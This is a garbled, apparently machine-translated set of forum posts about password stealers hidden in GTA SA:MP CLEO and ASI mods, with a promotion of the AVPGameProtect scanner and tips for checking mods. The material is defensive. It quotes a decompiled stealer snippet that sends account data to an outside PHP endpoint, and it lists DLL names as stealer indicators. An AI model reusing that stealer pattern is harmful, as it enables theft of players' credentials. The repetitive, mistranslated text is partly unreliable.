The very first scanner, which appeared back in the days when the first ASI styler was developed. The very next day after the appearance of the stiller, I began to develop my own anti-steeler.

The scanner includes the following modules:
- YARA signature engine (thanks to the Virustotal programming team for such a powerful tool),
- script engine from Andreas Jonson (AngelScript), speed, ease of embedding and beauty of similar scripts in one project. It is thanks to him that you can open cryptors for CLEO quickly and technically.
- SCM code emulator, capable of promoting CLEO cryptors quite well (from me)

Program features:
- Quite a large database of stealers, which has been growing since about 2014. We have collected quite a few malicious mods from several large and not very large sites.
- Ability to scan folders and files by dragging them into the program window.
- Conclusion brief information O malware(type, developer's nickname and, in older versions of the database, distributors' nicknames)
- Scan asi, dll, cleo, sf, cs and other potential dangerous files.
- Detection of malicious code in files with a changed extension, for example, not so long ago it was fashionable to rename stealers into txd files and load them into the game using the loader.
- Unpacking encrypted CLEO scripts and subsequent scanning (it should be noted that it decrypts only known cryptors and those that we came across, but this fact is easy to fix, just write to us by email and send the file). When you scan the unpacked script, you can find the source of the latter in the temp\decrypt.cs file.
- Emulate SCM code on the fly and decrypt the script, followed by checking for malicious code. (If malicious code is detected, see the dump in temp\decrypt.cs)
- Friendly and intuitive program interface.
- High speed scanning when checking a large number of files.
- Built-in viewing of the found file in text and hex modes

Particularly Important Point! Everyone should read it so as not to ask stupid questions.
The scanner is designed only for checking game modifications unpacked from the archive, in any other case it is useless!
He also NOT intended for installers and auto-installers, msi, exe packages, pif, mmbak, com, scr, vbs, bat, cmd, js and other potentially dangerous files not found in game mods, there are antiviruses for these files!
Also You should NOT scan the entire system, it's useless and makes no sense. This scanner is mod tested and is intended for mods only. You can scan the game folder, but here you need to understand that the game has files that can access the Internet and be ready to be seen in the scanner window.

I would like to warn you right away that this program will not protect your accounts 100%, like any other antivirus or scanner. When they write on the cover of an antivirus 100% protection, for me this is already a signal to remove the antivirus from the disk. But this scanner can speed up checking for already known stealers and help you avoid falling for the bait of inexperienced distributors.
Most best antivirus- it’s your head and decisions - to download or not to download. Download mods only from trusted sites and where the security of the archive is monitored.


The author of the program is not responsible for your decisions and possible stealers missed by the scanner.

Some symbols programs:

Attention! A file has been detected that can establish an Internet connection, you should think about it before installing it in the game. But this could also be auto-updating of the script. It is also possible to have a URL in the file. It all depends on your ability to check files manually.

CLEO styler was found, the file was unpacked and you can look at the source.

The scanner tried to unpack the script, but it may not have worked, or the malicious code was not found. See the source in the temp folder. Make sure the file is not encrypted. Here you need to check the script manually.

Found CLEO stiller in open form.

A file has been found that downloads malware onto your computer

A stiller from a notorious project has been found

Protection found, file may pose a threat. Here you just have to rely on the honesty and reputation of the author. Ask the author why the file was encrypted (protected), and then think for yourself about the adequacy of the answer. This file may well be dangerous.

Perhaps the file is blocked by another application, or the file is zero size

I do not recommend putting such files into the game. Anything can be expected here. This is merging several files into one. Among these files there may well be a stealer or other malware. Don't trust glues. You can make sure that the gluing is safe only by sorting it into files and checking each file separately.

We kindly ask you to download the program only from official sources. This will be the most safe option.
Please write about any errors by email or in this thread.


For dynamic account protection, we recommend using a special plugin from DarkP1xel.

This plugin blocks dangerous functions in scripts and other mods.
If you have this plugin installed in the game, then the mods will not be able to send web requests to third-party servers, which means that your samp password will not fall into the wrong hands, even if you accidentally installed the stealer in the game. The plugin also keeps a detailed log of all suspicious events in the game. Important. The plugin is constantly updated, stay tuned.
p.s: don’t forget to thank the author for the plugin;)

Thanks to everyone who helped us.
Special thanks to Gedwadion, DarkP1xel. These are cool guys who have a future in IT security.

Authors:
smalloff - development, project support
andre500 - testing, project support
Authors' websites (official sources): website, Libertycity.ru
Mail: smalloff@site
Download program:AVPGameProtect18042019.rar
Treat the program developer to beer (thanks in advance): Yandex unfiltered

(Attention! Support for the public project has been completely discontinued.)

[Serious voice of Chonishvili]: Without many words. Screw the show. While I’m writing this, your bulletin and villa on BB have already been merged into the state, and the virtuals have been transferred to the attacker, ah-ha-ha-ha, cough cough cough cough *choked*

You can cool your farts, because cleo files are not uploaded to the site. But this does not mean that they are prohibited on the Samp-Rp project. Don't get confused, damn it!
All fans of modifications have come across the concept of the term “Stiller” (a.k.a Keylogger, but that’s another story). Usually, stillers put them in cleo-scripts, which we will talk about now.

What is a cleo script?

I won’t explain what a cleo script is. general concept, let's move straight to the online game. Cleo-scripts for SA:MP"a are designed to improve the comfort of the game. Thanks to them, you can change the interface to suit you. Fix various bugs, crashes, etc. But there are also malicious (or cheating) cleo-scripts (cheat - deception from English), which, by the way, are strictly prohibited on the Samp-Rp project . They were created for children who are offended by life and who were beaten at school. Well, you can’t help but insert the phrase: “Chits are like Viagra, for those who can’t do it themselves.”
The most famous cleo-scripts ( .c leo s cript files) - this is an HP indicator in numbers, a square radar, a script that increases FPS, various forms of armor and health stripes (sometimes these are not even just stripes, but your favorite character, for example A$AP Rocky. As HP decreases, the photograph disappears and only the silhouette remains).
Many people are tormented by the question, why is there no enb series on the site? The fact is that .asi format, this is also a cleo file, only compiled. That is, you can also sew a styler into it.
You're probably wondering why I'm writing a topic if there's no Cleo on the site anyway. But this is not on the site, but to contain it you at least need StreamMemFix1.0 .asi And this is just one of the many fixes for GTA, of which every fan of pumping up his San is full Andreas mods to capacity, and thereby make candy out of it. And I’m already silent about c-huds and other modifications. Do you feel sorry for the account? Then this topic is for you!

How to check a .cs file for a styler?

The most common way is checking through the program Wireshark. All you need:

• 1. Download the program itself (you can do this from the official website).
• 2. Watch this video, everything is explained there clearly.
  

=====================================================================================================

The second way to check Cleo for Stiller. IN latest version cleo-libraries are coming additional programs, one of them is called Sunny Builder- what we need.

0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - site where account data is sent.
@stealer_by_mg 0 1@ is the developer of the stealer himself.

=================================================================================================

Also, there is a third way to check the file for stealer. There is a script "steal_logger" .asi"We'll use it to check.
(Yes, he himself is a cleo format, but there is nothing to worry about if you don’t think of going into the base with him). I won’t give you a link to it, look for it on the Internet.
I will briefly explain how to use it.

• 1. Put it in the game folder.
• 2. Let's go to any SA:MP server, under any no one
• 3. We come up with any password, log in and close the game.
• 4. It should be created in the folder text file (.txt format). Click on it, and in the text we look for the line with the IP of our server and the password for the newly registered account. Found - it means the hacker already has this data. Let him be happy when he comes in to play with the whip. And at this time we are deleting the last cleo file.

[!] Use as a check only newly created accounts, do not log into your main accounts with this script. After checking, delete \ or make a separate copy of GTA for checking scripts [!]

How to check the .asi file for stealer?

The easy part is over. Now let's learn to check .asi-files, because the styler does not see Wireshark in them. What to do? I'll post a couple of the most well-known methods.

Most effective method checks. Checking through the program IEInspector HTTP Analyzer.

===============================================================================================================

The second way is to check the code with notepad.

• 1. Opening .asi via Notepad.
• 2. Let's look at the code.

Example of pure when (No stiller)

Example code with stiller(not kernel.dll)

Let's pay attention to the last lines.

Another option for a hidden stealer is the names in the text "urlmon.dll", "wininet.dl l", "wsock32.dll" in the code itself. Or the line " kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA LOADER ERROR"

========================================================================================================

"The administration does not restore lost accounts"- they said.
"Account security is in your hands". I hope that after reading this topic, your “hands up” have become stronger. Take care of your accounts.

2015-2015 © Collected from various forums.

AVPGameProtect is a program that helps you search malicious files in game modifications. main feature programs ahead of other anti-stealers - the possibility of mass scanning, i.e. you can scan absolutely any files and in any quantity, just transfer necessary files or a folder with files into the program window and wait for the scan results.

Program features:
- Large database of stealers, which has been maintained since 2014.
- Scan asi, dll, cleo, sf, cs and other potentially dangerous files.
- High speed when scanning a large number of files.
- Display information about the stealer in the program window (type of stealer or developer's nickname).
- Built-in viewing of found files in text and hex modes.
- Search for functionality for interacting with the Internet or downloading files.
- Checking CLEO scripts for the presence of a stealer (not all, only those with cryptors known to the program). The decrypted script will appear in the temp folder, in the root folder of the program under the name decrypt.cs
- FuncCrypt transcript from SR_Team and many others.
- Continuous support of the program.

The scanner is not intended for checking installers and game builds, or for a full PC scan. To scan, you need to extract a folder or files from the archive and drag them into the program.

It is also worth noting that the program does not protect users 100%. Like any other anti-stealer, it is intended only to identify stealers known to it, and the further decision to use this or that mod lies directly with you and the author is not responsible for YOUR decisions. The program will be constantly updated.

Some program conventions:
InetLoader- Attention! A file has been detected that can establish an Internet connection, you should think about it before downloading. But this could also be auto-updating of the script.
CLEO_Stealer - CLEO styler was found, the file was unpacked and you can look at the source.
CLEO_Crypter - The scanner tried to unpack the script, perhaps it did not work, or the malicious code was not found. See the source in the temp folder.
CLEO_Stealer- Found CLEO stiller in open form.
Downloader_stealer- Found a file that downloads malware onto your computer
Stealers_ru- A stiller from a well-known project was found
Danger_VMProtect- Protection found, file may pose a threat
Failed to scan - The file may be blocked by another application, or the file is zero size
JoinFiles- The scanner found several files being merged into one. Among these files there may well be a stealer or other malware.

How can you avoid running into a stealer?!

Stealer is a script that is installed by copying a file with malicious code into the GTA folder. After installation, every time you log into the game server, it will read all entered data in dialogues (pin codes, password, secret keys, data) and send them to the attacker. Thus, by simply installing the script in the GTA folder, if you enter the correct data into the dialogue, you can lose all your game accounts.

On this moment Cases of theft of game accounts on various Samp servers have become more frequent. Most often these are servers with Role play mode, since the game currency has its own value. Attackers make money from your stupidity. In this article I will show you the methods that I know. You know, the people who make these stealers live by the principle “If you don’t eat, you won’t live.”

Basic tips:

1. Always use all methods to protect the account provided to you by the administration of the project on which you play. (Graphic PIN code, SMS binding, etc. It all depends on the functionality of the server).
2. Use a password that is as long as possible and has a complex structure.
3. Do not log in to the server with a password that you use on others.
4. Do not share your account information with a person you are not 100% sure of.
5. I do not advise you to use various custom modifications in the game. They may contain an encrypted virus (Stiller). Stiller (from English to steal, to steal) is a certain class of Trojans (malware, viruses - whatever you want), the functionality of which consists entirely of stealing passwords stored in the system and sending them to the “author”
After you have installed the stealer mod, when entering the game you will enter your password and it will successfully pass into the hands of the thief. Most often embedded in mods such as (Hood, graphic settings and Asi plugin).
6. Use an antivirus! It does not allow you to send your saved mail or account to infected sites (protection against grabbers and stealers (exe)).
7. The SA:MP server administration does not restore hacked accounts and does not return money that was lost and will never ask for your account passwords.

First way.

And so the first method is 100% effective!!!
If you don’t download various mods, cleo scripts, cheats, then you won’t have ANY problems and NO stealers!

Check through the website:

The first method will protect against all hacks, but this is not suitable for everyone.
And so the second method is suitable for those who download scripts, various mods, hoods, cheats, and so on. Therefore, I have a way out for you, but it will not protect you 100%! A site that checks files for various scripts, right here . By visiting the site you can read "

The newest versions of stealers may have .txd .dff .png .dat formats. But they are connected in .asi .cs .sf plugins and will not work without a connection. Therefore, check all plugins and scripts using our checker. If you have hidden files in GTA, delete them.

From this we conclude that now stillers can embed a regular photo into mods, even in a .png file. Many people say

“Are you a sheep or something? Get out of here! I’ve been playing SA:MP for 5 years and I know that stealers only come in mods or cleo formats!”

There are no guys, as we can see even in a simple picture, weapon.png let's say I know, maybe a stealer! We always check any mod, how would you even trust someone. And so, when we check the file for the stiller, if it pops up

Search results information:

Stealer not found:

During the file scan, no malicious code or anything suspicious was found. This means you don't have to worry about your account, our checker uses everything possible methods detecting malicious code in scripts.

Program features:
- Quite a large database of stealers, which has been growing since about 2014. We have collected quite a few malicious mods from several large and not very large sites. Special thanks to the site Gtavicecity.ru for the samples provided.
- Ability to scan folders and files by dragging them into the program window.
- Displays brief information about the malicious program (type, developer nickname, and in older versions of the distributor database)
- Scan asi, dll, cleo, sf, cs and other potentially dangerous files.
- Detection of malicious code in files with a changed extension, for example, not so long ago it was fashionable to rename stealers into txd files and load them into the game using the loader.
- Unpacking encrypted CLEO scripts and subsequent scanning (it should be noted that it decrypts only known cryptors and those that we came across, but this fact is easy to fix, just write to us by email and send the file). When you scan the unpacked script, you can find the source of the latter in the temp\decrypt.cs file.
- Emulate SCM code on the fly and decrypt the script, followed by checking for malicious code. (If malicious code is detected, see the dump in temp\decrypt.cs)
- Friendly and intuitive program interface.
- Quite a simple concept of the program, which means it can be easily and frequently updated.
- High scanning speed when scanning a large number of files.
- Built-in viewing of the found file in text and hex modes

The scanner is intended only for checking game modifications unpacked from the archive; in any other case it is useless.
It is also NOT intended for installers and auto-installers.

ATTENTION!!!
I would like to immediately warn you that this program will not protect your accounts 100%, like any other antivirus or scanner. When they write on the cover of an antivirus 100% protection, for me this is already a signal to remove the antivirus from the disk. But this scanner can speed up checking for already known stealers and help you avoid falling for the bait of inexperienced distributors.
The best antivirus is your head and decisions - to download or not to download. Download mods only from trusted sites and where the security of the archive is monitored.

Some program conventions:

IN DEVELOPING

HttpAnalyzer is a network traffic analyzer. If you were looking for a functional tool whose purpose is to monitor HTTP and HTTPS traffic in real time, then I think you should like this program, it is a kind of sniffer that can clearly display all the necessary information about connections!

In general, HTTP Analyzer can do a lot of things, I think you can read in more detail on the official website, I wrote the main idea.